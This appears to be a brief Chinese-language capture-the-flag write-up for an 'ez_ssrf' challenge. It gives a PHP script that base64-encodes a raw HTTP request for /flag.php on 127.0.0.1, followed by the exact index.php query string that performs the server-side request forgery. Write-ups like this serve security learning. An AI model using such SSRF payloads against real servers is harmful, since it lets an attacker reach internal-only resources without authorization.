ez_ssrf

First Post:

Last Update:

应该是从index.php传参,ssrf然后访问到flag.php。

因此构造poc.php:

1
2
3
4
5
6
<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data,host为127.0.0.1,port为80

传参:

1
/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=